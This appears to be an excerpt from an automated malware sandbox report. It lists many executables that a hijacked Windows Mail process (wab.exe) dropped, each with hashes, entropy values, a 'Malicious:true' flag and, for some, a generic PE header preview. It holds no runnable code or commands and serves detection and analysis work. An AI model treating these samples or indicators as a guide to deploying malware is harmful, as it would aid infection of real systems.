                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):670928
                                                                              Entropy (8bit):5.936386014437268
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4wbRB+ZRhFfGNpzX5PtiPWRnTLtx5eq4/RnYRoS2Ds+2EYR1XLlShtg7ksyST2Rz:4wbT+ZR3fGrzX5PtiPWRnTLtx5eq4/R9
                                                                              MD5:EC4DCAECC36C36010C2E887BCF43E330
                                                                              SHA1:E03D5A16C55182C2A2C3FEC77FA2B61DED2E8452
                                                                              SHA-256:106C086E34880154252DC126B873022482E00DC5393221D0EEB58B6DD3F61613
                                                                              SHA-512:CE653BB3AB1802439105C08E7DEEDB2FBF1800D5BADE205F44DCBE9BF000B0F439C948C273A45DA18A18C87D85EB7E64331992877EB8EB9D981C1CAB2C3E40E0
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):115920
                                                                              Entropy (8bit):5.6753678855989245
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoEw9K75Rp1Ukkz2zct/rzdaBotnMuvWM6TUaE:/rkDw9K1Fiz2ir+o5vWM6TUaE
                                                                              MD5:EA8D8609056B190AC92C23DD650BD6EF
                                                                              SHA1:6426393186982F636CE121704382ABDFF75BB4A7
                                                                              SHA-256:D2D09630ED66662A22F768DBC36F5202CC502D8FC58E6A2A5D29F59700006020
                                                                              SHA-512:453D530CFEEA78084339119658DC2397A6848D19902AAB31B7BADB46EED6DAAECEA2564664181C724F8F16A9D616CF7DE44C03532AC2A306B48F97B10D4918B9
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):137776
                                                                              Entropy (8bit):6.120121862589257
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoMLS+I1HtQdiHN4zbyezltnzGd1XuDxhkrTJwNZ5wmW1aHbfC:/rkCMi+zWeXdswvqiHm
                                                                              MD5:829CB1493FD8C6F15376EEF64761531A
                                                                              SHA1:282C572395117635B1C4C44732EEDE8CD65AF5F7
                                                                              SHA-256:BFA3A7A9ABC6AFD35B2748CF257FD12A521722142ED9CA73B4E0B39A5190118B
                                                                              SHA-512:243F353303DC74EF1183026EE65591BBFCB304F26A5CBE3E9E2EDEFA9946BF89C11BCA788EFC90B474D79371B5D38D13B6DBC466DB973BE5D9C570F168153D19
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1206680
                                                                              Entropy (8bit):4.8259897811858545
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+61ZFViRpx5tuwZl4asd/arEISgX0IkEMhTy:+61jViRTfVINdCr6gX0hEl
                                                                              MD5:FB2BD6E7F39070E272740B92E84DB8AA
                                                                              SHA1:1E7368F37A4E27701A124DE31E3604FF5F100EBB
                                                                              SHA-256:1B338C2D04893C390870D5B7E554BF2926CDBB9BEA3058D459E09A07F416C843
                                                                              SHA-512:88BA77D8180704EF8D7C9CA704A099D7945C13FF33099C26F59026E6A30E908F276B14081DDF01CFB86459F242DCA83E8B6C17D0172BC1DCA16F88B995D14939
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):400336
                                                                              Entropy (8bit):6.545670669710066
                                                                              Encrypted:false
                                                                              SSDEEP:12288:G1rOCPapfd5bhooUBuFiExw/LXa20Dj6EzfJ:CrfIbbhooUBu3wzXa/Dj64
                                                                              MD5:AB23B72F228F04A0DAFFF541E32A4EBA
                                                                              SHA1:8770A0BAD7E668DEE5D226192DFA580B41F9878E
                                                                              SHA-256:50FD4D6AE87587BE2E99F87FB937644EAD3D0F09BA41D18BFF24EFD8606F9DF4
                                                                              SHA-512:658970F71F357BA0F241F14D77A3C59FFFB1A1961F75A9DD2C236412A0D451D109326DDE160A49FAE6776926B5912D01E8181709F6089C3567B906B5395D442D
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1662344
                                                                              Entropy (8bit):4.231175782494914
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkfK2OKsuWoZEsVK2OKsuWoZEckAQckAIDpAPfKrss1yyKrss1yAZDvYbNDzVY9:IztkAzkAZqrEdrEAZUCwFjNNYEzcL
                                                                              MD5:92FA319DBFAB7C5461D7090E78829B86
                                                                              SHA1:484EE02AD12B66F92F34DFD4B420F7A6632AC2A0
                                                                              SHA-256:776CCAC7EC3B35D5C22D5B67F8A167CFF50554EC1D31D679EE315353CA8B092D
                                                                              SHA-512:E2FE18E0F9CE8E648042B626E7D516149A300E121B9FC94911DBD88EF74855C57F9926807528BA1423F262F65AE4044EFB1A669FF9AD21B818CACED6069BF847
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3531712
                                                                              Entropy (8bit):3.7572585003160985
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rks2OKsuWoZE/B/SRD17QYFCYKsQojSXQojSfE1c9AvWiYwOsAE1c9881jLvsDF:GgSRJQYKV++VYwjatvsDVpDsehRAKzYM
                                                                              MD5:BFB3BE900341A821EBD55FA532ECE5EE
                                                                              SHA1:766D0BA424A86EBD4ADFA3E35BBC161BC0BF286C
                                                                              SHA-256:B89EABA2791BD53C106CB478B3AFD3A06D1AA34C12C067324C5954B1560F9AA9
                                                                              SHA-512:2A053A3F810B6DAC703B42A0628168B774DB051B390335725429AB566294E389BACBDA0BF5BF7378EB59A2EF769E73BB45736464E1BB3CBF5CC15CDBFC53B459
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):83880
                                                                              Entropy (8bit):5.823944915840722
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoNKfEBr3fHT4nAzHGkYJ+ziw6+zb:/rkePh3IAzHGEJn
                                                                              MD5:FC67F440A689C3EE90251D6C2C4E2C9D
                                                                              SHA1:7F20C0098B95C41AC33A96F4ABF0581AE3E5D995
                                                                              SHA-256:F428B30BEB050212F0A9E6FA72E4D7FCF86CD52B3FB9FD43E5A0FC54C3B489BB
                                                                              SHA-512:982943EE35AA49ADAB5E45E7FD7AD209FF4BE057C71B2B732DDDCFC78B3673C0EC8CEA83B7DA2C82BAE73BE0E1B4A0C66C497F519C5F46AB31BB6CB7D247DE06
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4319112
                                                                              Entropy (8bit):3.7943883996506433
                                                                              Encrypted:false
                                                                              SSDEEP:6144:uUh82lTMY/C3uuQyMyquNlBXYJ7M444IB:ukyIgG47B
                                                                              MD5:FEB87B50F28805BBBFD4E61540E74928
                                                                              SHA1:8AD8B96031374469E1C8A6603B20B2D54D6952C3
                                                                              SHA-256:54B62651B987E81F90B6B8BB1F74CDACE2B0FA0D507B97DD45D789F8377A38F9
                                                                              SHA-512:ABA09F5254CB6BF70093997C4347DC545254C7C289723C62287F2D31D9F0B41206380DAF93E5F8DA0F2D5A3BC1BF0F18C5F6746E83948C36F4A6954789E4784A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):785448
                                                                              Entropy (8bit):3.8385138127727325
                                                                              Encrypted:false
                                                                              SSDEEP:6144:oWSXeSC+hBMdNRneNMToeGYeneqjpGtBlmF:oLevUEcLe9l2
                                                                              MD5:1402F0423B2FB1FF2782284DD0D90BD8
                                                                              SHA1:7CA6379EE4FA2348E7373632E689715AA8451C8E
                                                                              SHA-256:E4268E89FF0D78048C987424945B1C65773926EBD9122923E1B84D2D7ED0476D
                                                                              SHA-512:22B2A31E677A410EEF0CB40587EC881E2D29EB06B64123116A6E58572C1FD9B53DFB73B788A42C3DC0E615C88BE3BD949CC2E04F3422A4130B4954AE129F4B11
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1081280
                                                                              Entropy (8bit):3.6924247178826266
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkOyTUawK12P04ti0o5gmQNJDJnJG20FxPlJPJSS12Zzwww6G:9s4wqmQN59wtSS2zwmG
                                                                              MD5:C375297B394AD1111289612F87FFEA9F
                                                                              SHA1:F5FC1F348DD8344D9BCEA024964BB0B5FF018B01
                                                                              SHA-256:ABF9CE89E824EC6E39F30000F3F8928FCDD6E506897505B9E19CEC4EBF7E5E1A
                                                                              SHA-512:E0F105D82F4E0BC6F503877F56D48CC742A702C5A80665B9C97F674A5F1EBB18567E78DB5B180E9FC1A252C0682D33980F553C8700DDB31A7A45ECD727CA48B6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1722808
                                                                              Entropy (8bit):6.458274782007939
                                                                              Encrypted:false
                                                                              SSDEEP:49152:vuoh1EWXRkd+h9y6NsRZ9MtL4kD5G5LVuhqITJemL9SQM3:vuohO2km9PNsRZ9MtL4ktG5LV93
                                                                              MD5:C94CAD958EFE5BB77D4D31CF9D62D863
                                                                              SHA1:D1BD3FCDD57BDE432F49D020985257B26014C84D
                                                                              SHA-256:B9A4C86E6AFD87E343FF29FA306FE257A426AF7C4F3B30F0172735D9FCCCDA2D
                                                                              SHA-512:4547EB7B45411F4AFD00E2C35DA91BFA142B5B11151466C888A0ED6BC20A326DFBF8D4B1BBBFA8FA56DFDFDE40DABAB7FE26F88A838B9BEBF22A0097F54E7106
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):307784
                                                                              Entropy (8bit):6.374475137741311
                                                                              Encrypted:false
                                                                              SSDEEP:6144:9+OpwoajoJ/cLr6eNI0A2kg79zge/ceeE1+v:9DWhS5g72veeU+v
                                                                              MD5:6BF22D15646E7998D748CD42C23AB626
                                                                              SHA1:89D49CF33D773AD86B4E1CC7D9E7021216B937B0
                                                                              SHA-256:AF364BB28D01FC59D7A9A9CD9A2CACC66D0E0020C64D93E8C5A0BBC95DFE8C6E
                                                                              SHA-512:3BF8681007FE707F8E87B28F0D0F6263C6247FE251C2B9339322063B029BACA0BDB9FFD5058B02C04132765F08A39933D8663CA7444441294E0C5888D3D8F2F4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):97920
                                                                              Entropy (8bit):5.808712601175728
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3Vo3zKAtCz72I/Q/RPTO5piDDFwzS:/rkguFvgy5piDD6zS
                                                                              MD5:2196FCEBBDCC593CF5A85F3207970CA4
                                                                              SHA1:9C6B9085378B56500161BDA6339E791A7829F56F
                                                                              SHA-256:B40B4E0A728C5BE2D266FD6BE1E719E65C5DC10D46F15B2DEB346D3ED1B2421D
                                                                              SHA-512:56D7A1B02F56F3BEE9E0038857EF025B0896004A3A077089EE15DC21E3D80C2DD27D46AE11BB7BA877B540C8408EAFEFE57D9B4BE7B05164F33ECA61ACD2F650
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1994448
                                                                              Entropy (8bit):6.525646487599016
                                                                              Encrypted:false
                                                                              SSDEEP:49152:Jl8U9+tiqfG7C+5I6ZOX0Bh4MdDHc/EBRXXZUABfmcQ:Jl8+++7hOXODHc/EdQ
                                                                              MD5:410F8406572FEEF24894B4A4E98FFA77
                                                                              SHA1:A84E51801825B47741FF4ADBA49FBADFC0A44E4B
                                                                              SHA-256:21C6F535FC1ECE2A2CF21F0C54BA190A6A065E4F241AA1DB2068E42AD424FBCA
                                                                              SHA-512:C6543AC541D669DD8B6286DACAD02F25854276EE41DA02F00471CDF6ACCB87CAD04CF517D2712A1E5F88E1BCCE29DCB21183D6C047E94CACB9C2ABAD27D8C22A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):275872
                                                                              Entropy (8bit):3.942096448686192
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3Vo06gJJRaCAd1uhNRu7z3zHt4s+zbCtbCc0xXNmi9RHYOqEWpVOYlOj:/rkn6gxe7z3OzY+9jTYbE+la
                                                                              MD5:61B5DB2F53781D6F8236546BA08301C2
                                                                              SHA1:D9702B47E98A10449322EFD5153CD297FF913D5F
                                                                              SHA-256:F9732C0E5E5B0DCCE692BD04AFAC17DCB68C9521109D49635D309144077D8323
                                                                              SHA-512:F2D93CFFA723E19BEFB62B2663DCB4C5DD363F5E3EBC38BC43B853ACEF00C210AA417E753B5A18F7B353CF0EB4123764A99BFC06E416344D7589A52CB3277D40
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):751520
                                                                              Entropy (8bit):6.454372812643737
                                                                              Encrypted:false
                                                                              SSDEEP:12288:1ccV8BFJ0kz4uP9V6wY2M48aVNfffNfYRweSat8UVNfffNfRtAUUn4lDW7f5sBzl:1OFJbl/6r2M48aVNfffNfWVNfffNfDw+
                                                                              MD5:0F5EA69F9B731ED7976FE7A5BE3112C9
                                                                              SHA1:F215DEEA7A962AD53918B357D3446C87F20B35DE
                                                                              SHA-256:FD7C87041D679B9DD33771C07F05E926623285DFBCD03E4C2285872796213643
                                                                              SHA-512:298081DEAF16A6647C0345931B9E265C0FF62045EDF455F1A05D5A0DF1F926152E4945D707EFD09D0020FE42C798AAD8CEBCD3485DB3EC69201E95BF1357D22A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):182712
                                                                              Entropy (8bit):5.991097370883514
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkDDbGpEPwVH+lMCNy0GEVVS1ikLrDdevXqHai8MBEL4:AXSSwVgvfkhvzHcWEM
                                                                              MD5:2ECB09CF5AC73C6FA0F79F569C5F5E33
                                                                              SHA1:021A327B831B7274F99D0CC901D53F60C2FD6DEB
                                                                              SHA-256:67D9B8EE314FFDDCDB506B2406A0DE54FC016CF45BB290F905B0C21E0D1B97F0
                                                                              SHA-512:C3A3EAEB57F06E8316B0F2A3AE9F53F26A226F1472403A482BF64D25922D53D4AE5407BC0BC3099CFF6016D9CA6023508653D68C0BF67F25627E9492C49F1338
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):5174360
                                                                              Entropy (8bit):7.254989378596742
                                                                              Encrypted:false
                                                                              SSDEEP:49152:Z/xFnOvtaWIDn0apLKkLJU9nU2foKhA4vSWidGHp+NDGQUzbpDOfjxAkrQKl+RPp:LtLK3BDhtvS0Hpe4zbpaAKQkroGIz
                                                                              MD5:9C81D83BB362C1DE8724A9D0F2FDE901
                                                                              SHA1:804F2A1A3452F0EE2A2927D2817FDED08537AF86
                                                                              SHA-256:B620BDB560C23896656F932757F75224BAA4F021EF5273E0E50C2D0589CA0DEE
                                                                              SHA-512:2BCB260191D9B41C17C2967369F9376032084A2C849DF07C1CB36B0C7BDCDF33CBBF3DF5DC4F1E562608C9B1B33183DCD5E8E7C06907B6DFA8F971D6E600D1C6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):139712
                                                                              Entropy (8bit):6.126888776763665
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkyU5adWAKmzUccnzkVBgEuKjj0WWtPPoI:o+EjzCg+j6P3
                                                                              MD5:01C07B3F77E45B90A01EF08F9085EDAC
                                                                              SHA1:88E01F7DB25790C04120D1F0B07CE7FEDE5CC00D
                                                                              SHA-256:1BB7ABD1F7910288188F0E5BF4F47548F5D1DDB8D71DC3A7425BF85E4FE5D1C8
                                                                              SHA-512:95213B6441F935826322EB8B3B1C77C9E853362FB391014EC440311DC06893D023BC88A57A4FFB7F5C111278C450D1D1B06FCC694FBBF199D4538EC37BB02240
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):380368
                                                                              Entropy (8bit):6.555084907734949
                                                                              Encrypted:false
                                                                              SSDEEP:6144:2zgSb/029S2P/7nzGxFrRN0r0ivCZci1FXiO8DaS4wwE0CBlFJmcx:Nw/2q/roN7ivCZci1FC74wdBlFYU
                                                                              MD5:AA927AD1ECD836AC249D42BF94DE3A65
                                                                              SHA1:51FF7EE07974A0BDD31A14E15C652832026C9700
                                                                              SHA-256:7F7D93ECFB08D1D594AA97FF649C18078A78239E8716F7D4AA369DC5733EAA9F
                                                                              SHA-512:A942E512BEC89434D862BF09E39C157F6FE1243B31C0719EE5257285ADE088F532F3DAD6AADDC2D9DB29C0D1B26E39DF8B79C825D8721C522E9BD286809AA161
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1269696
                                                                              Entropy (8bit):3.675615217628684
                                                                              Encrypted:false
                                                                              SSDEEP:6144:Yvk8/0NhFYAddenZhUhTNnLUrh+9nTGLljX4wuSzVF:k4wXF
                                                                              MD5:B02491C0452A296007FEFEC01AABABFB
                                                                              SHA1:8E83A59312B8FE84FCAFF98D0A4180A4653BA36D
                                                                              SHA-256:2458D82B300F063EBDFB5495840EEFBDF86B6A331AE80C4B93C0D007435F372B
                                                                              SHA-512:E1D9154181404195A0FB1BFF2680F3B534EA248C393623D9E60FC0E5CF7CFDE3C11CEFD7D4F562C176E08856656612E68EA130FE1EBF6F3D66BCF130DD3EC9D2
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):266648
                                                                              Entropy (8bit):3.885766319937084
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VodRaCAd1uhNRuiazvhzpwtWhz7I3EWwwrwYx6RPWdn6ysl4DU1:/rkcezzvhF1h3wEWwwbx6ksl4D
                                                                              MD5:8B9DFC043238EDCB783ECD8C41A25945
                                                                              SHA1:FE7717581B04B161C6B461B00A614124B6CDA020
                                                                              SHA-256:09188D2E565E81399A01D92C291905CF50D750534526C03FC2B431EBA7893127
                                                                              SHA-512:9A17436D210A2B7C124CF89FDF947595D31B381679AFA394CE4CB91FCF867FD630DCDD5A13ECA03CAE77DB09761E86D9F83FC41A4E83D48C1BB1C173F605A75C
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):715760
                                                                              Entropy (8bit):6.454139818255074
                                                                              Encrypted:false
                                                                              SSDEEP:12288:a4tuuLntIMDXw5vde5EFf1Pmbd3lSz3dfp1Swf5M0blmFKuJOJZM30j3:dtFDKMg4iX3djfy0blmFlme303
                                                                              MD5:23804F478E35BBD0AD391BFA092BDFFF
                                                                              SHA1:93151FCABF6BB06771C9FD34A51D28F8300AAB3B
                                                                              SHA-256:62FC292394A77E876CC3F11A17E5A21D1CF799F16D79055FE8F64E8CC240EB97
                                                                              SHA-512:F674FA98BF32A0A174942E55751CF37BB394B2109A878755144A5924110DCF1C4008DE2EFA1A7690D6058ED19B3EC1235BC134BF722771CC866173EA4D89280D
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):619944
                                                                              Entropy (8bit):6.5605409599727995
                                                                              Encrypted:false
                                                                              SSDEEP:12288:nM/Of/Bboj+clWnIKgrP6TFPLNWuX4Pemn3oi8ky9Q8WSe/aSqizuO1qukdQAPnQ:M8JgryFPLNWuX40RulAPn1OcnGVNfffl
                                                                              MD5:0B36F896C07E98A40764FE8764947E5A
                                                                              SHA1:215A5AFC0DE422777682183200EBD4EFF5367268
                                                                              SHA-256:31B10F09605AF8492130A972EF3801D14E70FF683142EA2934323F3FA9353DF8
                                                                              SHA-512:2D613456F0C75693A67DAE00656E6C936AB83B577F7C6DB89F3EDC3A57145667AEFFF6A407146A83309C12B49AA0690ABE85A3C4D7E7C673260121ED85189E99
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):150416
                                                                              Entropy (8bit):6.119086865011351
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkQQPtLW7twRxI5mc5TNN3AsdVgNwihwT3RqEM6ZOfHXb42:ZQMzhdV0nh4Hof7
                                                                              MD5:0A9BABF248FD0BFACE70269A780E12B3
                                                                              SHA1:7300CD652E38734C26E4E1BCC6B2CCB06C69D335
                                                                              SHA-256:D17798E73699309E0889A1C09746EE5F7C4AE74F88BAF39434DAB06025B72535
                                                                              SHA-512:E3281E6CA9ADDE9542F6E80363D28FA870E16757625A7EB74837AEA773F178EAB17B7DA51DC4780747BCC04F9FC3C98BC379F7AF09C1F54642FA8C15ED414D7E
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):264576
                                                                              Entropy (8bit):6.453478056220304
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkMPuf72UasmkUTFxn40Zo2KoKik9CxIUUksZcRySTn2TGz+WXwMQuDyaqfqORM:l872jsLuLnPo2TTHswP2TGz3FUCHySYI
                                                                              MD5:FC28EB6FD5C6251911227A55E5F54776
                                                                              SHA1:9A3066DE720838BCDE5A0CD3295103DBAE51E980
                                                                              SHA-256:5439B9E784639C61CB1089FED2ED359A9CB9BE303CFB5C976E75D60AB929636B
                                                                              SHA-512:3DB3DD90B31A176CCF33E7FCCD484A54785E8E33100B88D150BAFA16DB44075A038AA3BCBCF3947799E2C77E69675ED4E90F5E66B1B3A455E1E8A0F30A505EBF
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):108448
